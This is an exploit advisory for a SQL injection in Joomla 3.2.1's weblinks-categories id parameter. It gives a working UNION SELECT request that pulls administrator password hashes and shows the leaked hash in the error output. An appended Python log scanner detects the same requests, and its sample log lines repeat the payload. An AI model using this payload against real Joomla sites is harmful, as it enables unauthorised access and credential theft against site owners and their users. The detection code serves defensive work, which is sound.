# Exploit Title: Joomla 3.2.1 sql injection
# Date: 05/02/2014
# Exploit Author: kiall-9@mail.com
# Vendor Homepage: http://www.joomla.org/
# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip
# Version: 3.2.1 (default installation with Test sample data)
# Tested on: Virtualbox (debian) + apache

POC=> http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\

will cause an error:

1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN ( \)

Array
(
    [type] => 8
    [message] => Undefined offset: 0
    [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php
    [line] => 203
)

I modified the original error.php file with this code
---
<?php
print_r(error_get_last());
?>
---
in order to obtain something useful. ;-)

Now I can easily exploit this flaw:

http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29

and obtain the hash:

1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`,`m`.`core_content_id`,`m`.`content_item_id`,`m`.`type_alias`,COUNT( `tag_id`) AS `count`,`t`.`access`,`t`.`id`,`ct`.`router`,`cc`.`core_title`,`cc`.`core_alias`,`cc`.`core_catid`,`cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0 ) union select password from `k59cv_users` -- ) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5

CheerZ>
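Added detection example, not part of the original advisory: the `id` parameter of the weblinks-categories route is expected to be an integer, so a log scanner can flag any request where it is not. It assumes Apache combined log format; the sample lines are constructed and mirror the two requests shown above (the backslash sent as `%5C`) plus benign traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache combined-format lines; request targets follow the advisory.
SAMPLE_LOG = '''
10.0.0.5 - - [05/Feb/2014:10:00:01 +0000] "GET /Joomla_3.2.1/index.php/weblinks-categories?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Feb/2014:10:00:07 +0000] "GET /Joomla_3.2.1/index.php/weblinks-categories?id=%5C HTTP/1.1" 500 812 "-" "curl/7.26.0"
10.0.0.9 - - [05/Feb/2014:10:00:13 +0000] "GET /Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29 HTTP/1.1" 500 990 "-" "curl/7.26.0"
10.0.0.5 - - [05/Feb/2014:10:00:20 +0000] "GET /Joomla_3.2.1/index.php/component/content/?id=7 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_ID = re.compile(r'^\d+$')                       # the only shape a valid id should have
SQL_HINT = re.compile(r'\b(union|select)\b|--', re.I)  # crude keyword hint for triage only


def classify_request(target):
    """Return None for a benign request, otherwise a short reason string."""
    parts = urlsplit(target)
    if 'weblinks-categories' not in parts.path:
        return None
    ids = parse_qs(parts.query, keep_blank_values=True).get('id', [])
    for raw in ids:
        value = unquote_plus(raw)  # parse_qs decoded once; a second pass catches double encoding
        if INT_ID.match(value):
            continue
        if SQL_HINT.search(value):
            return 'sql-keywords-in-id: %r' % value
        return 'non-integer-id: %r' % value  # e.g. the lone backslash that breaks the IN ( ... ) clause
    return None


def scan_log(text):
    """Yield (client ip, status, reason) for every suspicious weblinks-categories request."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reason = classify_request(m.group('target'))
        if reason:
            findings.append((m.group('ip'), m.group('status'), reason))
    return findings


if __name__ == '__main__':
    for ip, status, reason in scan_log(SAMPLE_LOG):
        print(ip, status, reason)
```

A 500 status paired with a flagged id is the combination worth alerting on, since the advisory's first request produced a MySQL syntax error rather than a page.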